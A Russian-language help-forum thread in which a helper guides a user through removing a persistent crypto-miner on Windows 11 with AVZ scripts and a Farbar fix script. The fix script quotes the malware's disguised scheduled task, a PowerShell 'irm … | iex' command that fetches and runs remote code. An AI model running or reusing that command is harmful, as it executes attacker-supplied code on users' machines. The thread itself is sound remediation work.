[РЕШЕНО] Поймала Tool.BtcMine.2794, восстанавливается после удаления.

[kanaai]

Добрый день. Поймала Tool.BtcMine.2794, восстанавливается после удаления на Win11. Надеюсь на вашу помощь.

CollectionLog-2025.05.09-14.24.zip

[thyrex]

Здравствуйте.

 

Запустите AVZ из папки Autologger от имени Администратора по правой кнопке мыши.

 

Выполните скрипт в AVZ (Файл – Выполнить скрипт – вставить текст скрипта из окна Код)

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 TerminateProcessByName('c:\programdata\winaijservice\winaijservice.exe');
 QuarantineFile('c:\programdata\winaijservice\winaijservice.exe','');
 TerminateProcessByName('c:\programdata\cacservice\cacservices.exe');
 QuarantineFile('c:\programdata\cacservice\cacservices.exe','');
 DeleteFile('c:\programdata\cacservice\cacservices.exe','32');
 DeleteFile('c:\programdata\winaijservice\winaijservice.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','CAC Service','x64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','Win AIJ Service','x64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

 

Выполните скрипт в AVZ

begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine ./Quarantine/', 1, 0, true);
end.

Отправьте quarantine.7z из папки с распакованной утилитой AVZ с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.
 

[kanaai]

Новые логи

CollectionLog-2025.05.09-15.09.zip

[thyrex]

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

[kanaai]

Отчеты

Отчеты.zip

[thyrex]

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать)

Start::
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [Win AIJ Service] => C:\ProgramData\WinAIJService\WinAIJService.exe [13191680 2025-05-09] () [Файл не подписан]
Task: {DA3113D1-1501-4369-8683-34D1E140D3A1} - System32\Tasks\Microsoft\Office\Office Persistent Activation => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-04-06] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activation.techias.co.uk/ | iex" <==== ВНИМАНИЕ
Folder: C:\ProgramData\WinAIJService
2025-05-07 13:01 - 2025-05-09 15:12 - 000000000 ____D C:\ProgramData\WinAIJService
FirewallRules: [{717e2b8d-bf00-40ee-b78a-05b2b2e1b965}] => (Allow) C:\ProgramData\CACService\CACServices.exe => Нет файла
FirewallRules: [{f2c334ec-5696-4b16-b374-e35d0e88cf0b}] => (Allow) C:\ProgramData\CACService\CACServices.exe => Нет файла
FirewallRules: [TCP Query User{86F659F3-64BD-4E89-B8EC-043EB3758110}D:\games\the last of us part i-insaneramzes\tlou-i.exe] => (Block) D:\games\the last of us part i-insaneramzes\tlou-i.exe => Нет файла
FirewallRules: [UDP Query User{6747A527-EADF-45FC-9422-31418D26EC40}D:\games\the last of us part i-insaneramzes\tlou-i.exe] => (Block) D:\games\the last of us part i-insaneramzes\tlou-i.exe => Нет файла
FirewallRules: [TCP Query User{A8923723-3E8A-43D2-82B0-6D67D28E8B52}D:\games\train.life.a.railway.simulator.steam.rip-insaneramzes\train life - a railway simulator\trainlife\binaries\win64\trainlife-win64-shipping.exe] => (Block) D:\games\train.life.a.railway.simulator.steam.rip-insaneramzes\train life - a railway simulator\trainlife\binaries\win64\trainlife-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{9B9CA470-B0EA-41D5-A7D8-79659736E0FA}D:\games\train.life.a.railway.simulator.steam.rip-insaneramzes\train life - a railway simulator\trainlife\binaries\win64\trainlife-win64-shipping.exe] => (Block) D:\games\train.life.a.railway.simulator.steam.rip-insaneramzes\train life - a railway simulator\trainlife\binaries\win64\trainlife-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{C36F7EDA-AE71-4BFB-AF9F-70B78C9E4213}D:\games\assetto corsa competizione\ac2\binaries\win64\ac2-win64-shipping.exe] => (Block) D:\games\assetto corsa competizione\ac2\binaries\win64\ac2-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{477E619A-9325-4C91-9D61-DDF4BBD04D37}D:\games\assetto corsa competizione\ac2\binaries\win64\ac2-win64-shipping.exe] => (Block) D:\games\assetto corsa competizione\ac2\binaries\win64\ac2-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{6FB2C629-EAFD-4359-8BFD-00EC11B2341E}D:\games\assetto corsa\acs.exe] => (Block) D:\games\assetto corsa\acs.exe => Нет файла
FirewallRules: [UDP Query User{B4317D2D-55E1-4CBC-A83B-4BC52492B18C}D:\games\assetto corsa\acs.exe] => (Block) D:\games\assetto corsa\acs.exe => Нет файла
FirewallRules: [{5e052845-20c2-4f27-838c-c2c0f99e46a1}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
FirewallRules: [{968e96c3-2d2d-438e-8b58-54659b825834}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
FirewallRules: [{95d2fa27-d645-477e-9e40-860ebbe3a4fe}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
FirewallRules: [{ecbe1834-1b2a-4208-af55-b48c126e7a05}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
FirewallRules: [{05c7097d-72f4-440b-a299-f388017e21e5}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
FirewallRules: [{8af0e928-a45a-45b4-a32f-3b0c851a28cb}] => (Allow) C:\ProgramData\WinAIJService\WinAIJService.exe () [Файл не подписан]
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.
  

[kanaai]

Fixlog.txt

Fixlog.zip

[thyrex]

Проблема решена?

[kanaai]

Да, майнер исчез уже после первого скрипта. Большое спасибо за помощь!  с:

[thyrex]

Смените все пароли, они могли быть скомпрометированы.

 

Загрузите SecurityCheck by glax24 & Severnyj и сохраните архив на Рабочем столе.

• Разархивируйте, запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10/11);
• Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
• Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
• Прикрепите этот файл в своем следующем сообщении.

 

[kanaai]

SecurityCheck.txt

[thyrex]

По возможности исправьте:

 

CrystalDiskInfo 9.6.0 v.9.6.0 Внимание! Скачать обновления
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.38.33135 v.14.38.33135.0 Внимание! Скачать обновления
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.40.33810 v.14.40.33810.0 Внимание! Скачать обновления
AIMP v.5.40.2674 Внимание! Скачать обновления
^Внимание! Данный установщик устанавливает сторонние программы. Снимайте галочки или нажимайте Отмена в соответствующих окнах установщика.^

---------------------------- [ UnwantedApps ] -----------------------------
CCleaner v.6.35 Внимание! Подозрение на демо-версию антивредоносной программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.

 

На этом закончим.

[kanaai]

Еще раз спасибо за помощь! с:

[thyrex]

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в Турцию, Армению, Сочи, Камбоджу можете быть и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".